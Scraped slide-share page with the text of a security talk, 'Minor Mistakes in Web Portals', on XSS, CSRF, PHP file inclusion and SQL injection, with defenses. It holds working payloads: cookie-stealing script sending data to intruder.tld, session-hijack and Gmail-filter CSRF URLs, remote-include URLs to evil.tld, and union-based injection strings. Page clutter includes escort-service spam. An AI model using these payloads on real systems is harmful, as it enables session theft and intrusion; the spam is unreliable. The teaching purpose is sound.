Web Application VulnerabilitiesPreetish Panda
 
Hackers Paradise SQL Injection Attacks
Hackers Paradise SQL Injection AttacksHackers Paradise SQL Injection Attacks
Hackers Paradise SQL Injection Attacksamiable_indian
 
[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web DesignChristopher Schmitt
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 

Similar to Minor Mistakes In Web Portals (20)

DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
[convergese] Adaptive Images in Responsive Web Design
[convergese] Adaptive Images in Responsive Web Design[convergese] Adaptive Images in Responsive Web Design
[convergese] Adaptive Images in Responsive Web Design
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
[refreshaustin] Adaptive Images in Responsive Web Design
[refreshaustin] Adaptive Images in Responsive Web Design[refreshaustin] Adaptive Images in Responsive Web Design
[refreshaustin] Adaptive Images in Responsive Web Design
 
[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD
 
[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web Design[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web Design
 
Analyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAnalyzing the Performance of Mobile Web
Analyzing the Performance of Mobile Web
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
 
Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAs
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Hackers Paradise SQL Injection Attacks
Hackers Paradise SQL Injection AttacksHackers Paradise SQL Injection Attacks
Hackers Paradise SQL Injection Attacks
 
[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 

More from msobiegraj

[ISSA] Zagrożenia na 2008 rok
[ISSA] Zagrożenia na 2008 rok[ISSA] Zagrożenia na 2008 rok
[ISSA] Zagrożenia na 2008 rokmsobiegraj
 
[ISSA] Web Appication Firewall
[ISSA] Web Appication Firewall[ISSA] Web Appication Firewall
[ISSA] Web Appication Firewallmsobiegraj
 
[ISSA] Incident Responce
[ISSA] Incident Responce[ISSA] Incident Responce
[ISSA] Incident Responcemsobiegraj
 
2FA w bankowosci (Bartosz Nowak)
2FA w bankowosci (Bartosz Nowak)2FA w bankowosci (Bartosz Nowak)
2FA w bankowosci (Bartosz Nowak)msobiegraj
 
Strong Authentication (Michal Sobiegraj)
Strong Authentication (Michal Sobiegraj)Strong Authentication (Michal Sobiegraj)
Strong Authentication (Michal Sobiegraj)msobiegraj
 
ISSA Wroclaw -- Aktywacja
ISSA Wroclaw -- AktywacjaISSA Wroclaw -- Aktywacja
ISSA Wroclaw -- Aktywacjamsobiegraj
 
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacjiWeb Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacjimsobiegraj
 
Drobne błędy w portalach WWW -- prawdziwe studium przypadku
Drobne błędy w portalach WWW -- prawdziwe studium przypadkuDrobne błędy w portalach WWW -- prawdziwe studium przypadku
Drobne błędy w portalach WWW -- prawdziwe studium przypadkumsobiegraj
 
Technology Risk Management of Web Applications — A Case Study
Technology Risk Management of Web Applications — A Case StudyTechnology Risk Management of Web Applications — A Case Study
Technology Risk Management of Web Applications — A Case Studymsobiegraj
 
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczneJak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki ubocznemsobiegraj
 
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiemReputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiemmsobiegraj
 

More from msobiegraj (12)

[ISSA] Zagrożenia na 2008 rok
[ISSA] Zagrożenia na 2008 rok[ISSA] Zagrożenia na 2008 rok
[ISSA] Zagrożenia na 2008 rok
 
[ISSA] IDS
[ISSA] IDS[ISSA] IDS
[ISSA] IDS
 
[ISSA] Web Appication Firewall
[ISSA] Web Appication Firewall[ISSA] Web Appication Firewall
[ISSA] Web Appication Firewall
 
[ISSA] Incident Responce
[ISSA] Incident Responce[ISSA] Incident Responce
[ISSA] Incident Responce
 
2FA w bankowosci (Bartosz Nowak)
2FA w bankowosci (Bartosz Nowak)2FA w bankowosci (Bartosz Nowak)
2FA w bankowosci (Bartosz Nowak)
 
Strong Authentication (Michal Sobiegraj)
Strong Authentication (Michal Sobiegraj)Strong Authentication (Michal Sobiegraj)
Strong Authentication (Michal Sobiegraj)
 
ISSA Wroclaw -- Aktywacja
ISSA Wroclaw -- AktywacjaISSA Wroclaw -- Aktywacja
ISSA Wroclaw -- Aktywacja
 
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacjiWeb Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
 
Drobne błędy w portalach WWW -- prawdziwe studium przypadku
Drobne błędy w portalach WWW -- prawdziwe studium przypadkuDrobne błędy w portalach WWW -- prawdziwe studium przypadku
Drobne błędy w portalach WWW -- prawdziwe studium przypadku
 
Technology Risk Management of Web Applications — A Case Study
Technology Risk Management of Web Applications — A Case StudyTechnology Risk Management of Web Applications — A Case Study
Technology Risk Management of Web Applications — A Case Study
 
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczneJak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
 
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiemReputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
 

Recently uploaded

Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...lizamodels9
 
Ten Organizational Design Models to align structure and operations to busines...
Ten Organizational Design Models to align structure and operations to busines...Ten Organizational Design Models to align structure and operations to busines...
Ten Organizational Design Models to align structure and operations to busines...Seta Wicaksana
 
FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607dollysharma2066
 
2024 Numerator Consumer Study of Cannabis Usage
2024 Numerator Consumer Study of Cannabis Usage2024 Numerator Consumer Study of Cannabis Usage
2024 Numerator Consumer Study of Cannabis UsageNeil Kimberley
 
MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?Olivia Kresic
 
Call Girls Miyapur 7001305949 all area service COD available Any Time
Call Girls Miyapur 7001305949 all area service COD available Any TimeCall Girls Miyapur 7001305949 all area service COD available Any Time
Call Girls Miyapur 7001305949 all area service COD available Any Timedelhimodelshub1
 
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCRashishs7044
 
Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03DallasHaselhorst
 
The CMO Survey - Highlights and Insights Report - Spring 2024
The CMO Survey - Highlights and Insights Report - Spring 2024The CMO Survey - Highlights and Insights Report - Spring 2024
The CMO Survey - Highlights and Insights Report - Spring 2024christinemoorman
 
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...lizamodels9
 
Future Of Sample Report 2024 | Redacted Version
Future Of Sample Report 2024 | Redacted VersionFuture Of Sample Report 2024 | Redacted Version
Future Of Sample Report 2024 | Redacted VersionMintel Group
 
Call Us 📲8800102216📞 Call Girls In DLF City Gurgaon
Call Us 📲8800102216📞 Call Girls In DLF City GurgaonCall Us 📲8800102216📞 Call Girls In DLF City Gurgaon
Call Us 📲8800102216📞 Call Girls In DLF City Gurgaoncallgirls2057
 
Case study on tata clothing brand zudio in detail
Case study on tata clothing brand zudio in detailCase study on tata clothing brand zudio in detail
Case study on tata clothing brand zudio in detailAriel592675
 
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...ictsugar
 
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCRashishs7044
 
Flow Your Strategy at Flight Levels Day 2024
Flow Your Strategy at Flight Levels Day 2024Flow Your Strategy at Flight Levels Day 2024
Flow Your Strategy at Flight Levels Day 2024Kirill Klimov
 
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,noida100girls
 
Digital Transformation in the PLM domain - distrib.pdf
Digital Transformation in the PLM domain - distrib.pdfDigital Transformation in the PLM domain - distrib.pdf
Digital Transformation in the PLM domain - distrib.pdfJos Voskuil
 
Kenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby AfricaKenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby Africaictsugar
 
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptxContemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptxMarkAnthonyAurellano
 

Recently uploaded (20)

Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
 
Ten Organizational Design Models to align structure and operations to busines...
Ten Organizational Design Models to align structure and operations to busines...Ten Organizational Design Models to align structure and operations to busines...
Ten Organizational Design Models to align structure and operations to busines...
 
FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607
 
2024 Numerator Consumer Study of Cannabis Usage
2024 Numerator Consumer Study of Cannabis Usage2024 Numerator Consumer Study of Cannabis Usage
2024 Numerator Consumer Study of Cannabis Usage
 
MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?
 
Call Girls Miyapur 7001305949 all area service COD available Any Time
Call Girls Miyapur 7001305949 all area service COD available Any TimeCall Girls Miyapur 7001305949 all area service COD available Any Time
Call Girls Miyapur 7001305949 all area service COD available Any Time
 
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
 
Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03
 
The CMO Survey - Highlights and Insights Report - Spring 2024
The CMO Survey - Highlights and Insights Report - Spring 2024The CMO Survey - Highlights and Insights Report - Spring 2024
The CMO Survey - Highlights and Insights Report - Spring 2024
 
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
 
Future Of Sample Report 2024 | Redacted Version
Future Of Sample Report 2024 | Redacted VersionFuture Of Sample Report 2024 | Redacted Version
Future Of Sample Report 2024 | Redacted Version
 
Call Us 📲8800102216📞 Call Girls In DLF City Gurgaon
Call Us 📲8800102216📞 Call Girls In DLF City GurgaonCall Us 📲8800102216📞 Call Girls In DLF City Gurgaon
Call Us 📲8800102216📞 Call Girls In DLF City Gurgaon
 
Case study on tata clothing brand zudio in detail
Case study on tata clothing brand zudio in detailCase study on tata clothing brand zudio in detail
Case study on tata clothing brand zudio in detail
 
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...
 
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
 
Flow Your Strategy at Flight Levels Day 2024
Flow Your Strategy at Flight Levels Day 2024Flow Your Strategy at Flight Levels Day 2024
Flow Your Strategy at Flight Levels Day 2024
 
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
 
Digital Transformation in the PLM domain - distrib.pdf
Digital Transformation in the PLM domain - distrib.pdfDigital Transformation in the PLM domain - distrib.pdf
Digital Transformation in the PLM domain - distrib.pdf
 
Kenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby AfricaKenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby Africa
 
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptxContemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
 

Minor Mistakes In Web Portals

  • 1. Minor Mistakes in Web Portals A Real Case Study ;-) Borys Łącki Michał Sobiegraj, CISSP
  • 2.  Why is Web important? M
  • 3. Web is everywhere M
  • 4.  We spend money  We manage our finances  We earn money  We waste our time M
  • 5. Internecie traffic http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  • 6. 2007: Web traffic has finally overtaken P2P M
  • 7. Web has beaten pr0n! YAY!* * not supported by any research M
  • 8. HTTP traffic breakdown http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  • 9. Number of Internet hosts increases Over 60 mln active hosts (netcraft) M
  • 10.  Web security in a nutshell M
  • 11. Web vulnerabilities make up nearly half of all discovered vulnerabilities in 2007 (Sans) M
  • 12. Why?  A really popular medium ($)  Immature technology  Logical errors  Home-made solutions M
  • 13. Phishing victims in the US 3.6 million of people lost $3.2 billion total (Gartner, http://www.heise-online.pl/news/item/2356/) M
  • 14. Standard Web application architecture Internet WWW layer (I/O filters) Application layer (business logic) Database server M
  • 15. Wrong! Internet WWW layer (I/O filters) New functionality Application layer (business logic) Database server M
  • 16. Application Firewall vs. Proper  architecture, coding and SDLC Internet Web Application Firewall Warstwa WWW (filtry wejścia/wyjścia) New functionality Application layer (business logic) Database server M
  • 17. The right approach Internet Web Application Firewall WWW layer (I/O filters) Application layer New functionality (business logic) Database server M
  • 18. Most popular attacks  PHP Remote File Include  SQL Injection  Cross-Site Scripting  Cross-site Request Forgery (SANS Top-20 2007 Security Risks, 2007 Annual Update) M
  • 19.  Information disclosure B
  • 20. A funny story ;-) B
  • 21. More pics hmm… B
  • 22.  B
  • 23. :-D B
  • 24. Downloaded… B
  • 25. Connecting… B
  • 26. PWND ;-) B
  • 27. Conclusion? Staying secure requires specific mindset (Paranoia? ;-) B
  • 28. Client side access control  It’s possible to bypass the interface  Unlike in ATMs Does not work! B
  • 29. Client side access control  RSS feed name based on user ID server.tld/rss/100_rss.xml server.tld/rss/101_rss.xml server.tld/rss/102_rss.xml  Reading other user’s messages server.tld/index.php?p=ok&action=msgs2&msgs_id=80 server.tld/index.php?p=ok&action=msgs2&msgs_id=81 server.tld/index.php?p=ok&action=msgs2&msgs_id=82 B
  • 30. Solution: Server side access control B
  • 31.  Cross-Site Scripting (XSS) B
  • 32. Reflective XSS Server http://server/index.php?id=<script>…</script> GET /index.php? id=<script>…</script> HTTP/1.1 Web Intruder Application User …<script>…</script>… exec(…) Data available in the context of the User B
  • 33. Example XSS code document.write(‘ <img src=„ http://intruder.tld/cookiemonster.gif? ’+escape(document.cookie) +’ ”> ’); B
  • 34. Content alteration through an XSS attack B
  • 35. Rebranding through XSS http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117, 109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40, 34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,10 9,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,1 11,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,1 05,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E document.getElementById(quot;logoquot;).innerHTML= quot;<img src='http://www.srv.tld/images/smiley.gif'>quot; M
  • 36. This is how it looks in the webpage code ... <div id=quot;maincontentquot;> <h2>Results for: <span style=quot;color: #f00;quot;><script>eval(String.fromCharCode(100,111,99,117,109,101 ,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,1 00,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77 ,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,5 8,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,1 12,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,4 6,103,105,102,39,62,34));</script></span></h2> </div> ... M
  • 37. The code that is to be changed <div id=quot;logoquot;> <div class=quot;logolinkquot;> <a href=quot;http://server.tld/quot;>server.tld</a> </div> ... </div> M
  • 38. The code in a Web browser M
  • 39. Final outcome M
  • 40. Rendered in a browser M
  • 41. Content change using XSS  Is not permanent  Better code  easier (sic!) An idea: A form that looks just like a legitimate one, but sends input data elsewhere  phishing B
  • 42. Authentication using cookies POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user B
  • 43. Impersonating a legitimate user POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Intruder Welcome user B
  • 44. Session cookie hijacking http://www.server.tld/index.php?p=comm ents&comments_login=smietanka%3Cscri pt%3Edocument.write(document.cookie) %3C/script%3E PHPSESSID=gji9h519llgbgbnaqg7si0q1l0; __utma=258102041.949163972.1198624259.1198624259.1198624259.1; __utmb=258102041; __utmc=258102041; __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmc md=(none) M
  • 45.  M
  • 46.  M
  • 47.  M
  • 48. How to send yourself a cookie?  XMLHttpRequest Troublesome across domains  Link img, iframe, location.href, etc. Przykład: <img src=quot;http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7 si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259. 1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D25810204 1%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29 %7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29quot;> B
  • 49. What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (....//  ../), UTF-7 B
  • 50. http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif> / M
  • 51. http://server.tld/topics/<img  src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif> %2f  / M
  • 52. http://server.tld/topics/<img  src=http:%252f%252fwww.serv.tld%252fimages%252fsmile y.gif> %252f  %2f  / M
  • 53.  B
  • 54. Stored XSS Server POST /register.php HTTP/1.1 login=<script>…</script>&password=asd Web Application GET /index.php HTTP/1.1 <script>…</script> User …<script>…</script>… Intruder exec(…) Database Data available in the context of the User B
  • 55. Stored XSS Exploitation?  Permanent content alteration  Easy session ID hijack  CSRF  XSS Proxy  Automated worms - mySpace, Orkut, Nduja, Borys Easy ;] in web portals that allow users to publish their own content: - bidding portals, blogs, web fora, etc B
  • 56. Session ID hijack B
  • 57. XSS Worm Web Server Stores the XSS-worm code in their profile Intruder XSS … Intruder User_1 User_2 B
  • 58. XSS Worm Web Server Stores the XSS-worm code in their profile GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… … exec(…) Stores the XSS-worm code in their profile Intruder User_1 XSS User_2 B
  • 59. XSS Worm Web Server Zapisuje XSS w swoim profilu GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… User_2 … Stores the XSS-worm exec(…) code in their profile Intruder GET /user1/ HTTP/1.1 User_1 XSS …<script>…</script>… Stores the XSS-worm exec(…) User_2 XSS code in their profile B
  • 60. Nduja – A Cross Domain/Webmail XSS Worm Intruder E-mail E-mail E-mail E-mail Web Web Web Web Server Server Server Server WebMail WebMail WebMail WebMail Libero.it Tiscali.it Lycos.it Excite.com B
  • 61. What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (.. ..//  ../), UTF-7  Filter or sanitise data stored in and read from a database B
  • 62.  Cross-Site Request Forgery (CSRF) B
  • 63. CSRF Server http://server.tld/delete.php?id=34 Web Application GET /delete.php?id=34 HTTP/1.1 Cookie: user_id=734223s8uod42 … id = 34; Intruder delete(id); User … Item deleted! M
  • 64. Useful in getting to know your users a wee bit better… <img src=”http://nasza- klasa.pl/invite/1?i=1”> (/var/log/apache/fbi_cia_what-not_access.log) B
  • 65. Gmail message interception (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multip art/form-data&_action=https%3A//mail.google.com/mail/h/ wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@maili nator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_atta ch=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter Everyone (well almost) has a Gmail account! (Domain hijack: www.davidairey.co.uk) B
  • 66. What can we do?  POST instead of GET  not very bullet-proof: iframe, javascript  Referrer  not very bullet-proof either: proxy, browsers, header alteration  Additional temporary ID  User ID tied to a long unpredictable key  ID-key association held on the server side  Re-authentication before sensitive operations  An vulnerability-free code!!! B
  • 67.  PHP File Include B
  • 68. Local file include  Local file snoop (configs)  Arbitrary code execution (If file upload to the server is permitted)  Access to source code <?php if(file_exists(quot;includes/$page.incquot;)) { include quot;includes/$page.incquot;; } else { echo quot;In construction!<BR>quot;; } http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/publi c_html/.htpasswd%00 B
  • 69. Remote file include (Arbitrary code execution) <?php include($mosConfig_absolute_path.quot;/administrator/components /com_hashcash/config.hashcash.phpquot;); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoS trategy.php'); http://server.tld/components/com_hashcash/server.php?mosConfig_a bsolute_path=http://evil.tld/evil.txt? access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] quot;GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.t xt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.803„ access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] quot;GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/i d.txt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.76quot; B
  • 70. What can we do?  Harden the application server (e.g. in PHP.ini) allow_url_fopen = Off allow_url_include = Off register_global = Off safe_mode = On register_globals = Off safe_mode_gid = Off display_errors = Off log_errors = On error_log = /var/log/httpd/php_error.log disable_functions = system, shell_exec, exec, passthru  Watch out for some special characters (null byte, etc)  Filter and sanitise (../, UTF, etc)  WAFs: mod_security, Suhosin PHP B
  • 71.  SQL Injection M
  • 72. SQL Injection Server GET /login.php HTTP/1.1 login=admin&password=1’ or 1=‘1 Web Application Intruder select * from users where login=‘admin’ and pass=‘1’ or 1=‘1’ Welcome admin! $dane = db_exec(„select from users where Database login=‘$login’ and pass=‘$pass’”) if ($dane.count) { print („Welcome $login”) … } else { print („Bye”); exit (0); } M
  • 73. POST http://www.server.tld/index.php?p=priv HTTP/1.1  priv_search=2e332424&cat='quot;1&w_city=quot;'asd&submit=Szukaj M
  • 75. priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj M
  • 76. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj The used SELECT statements have a different number of columns M
  • 77. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submi t=Szukaj M
  • 78. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submi t=Szukaj M
  • 79. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_ NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj M
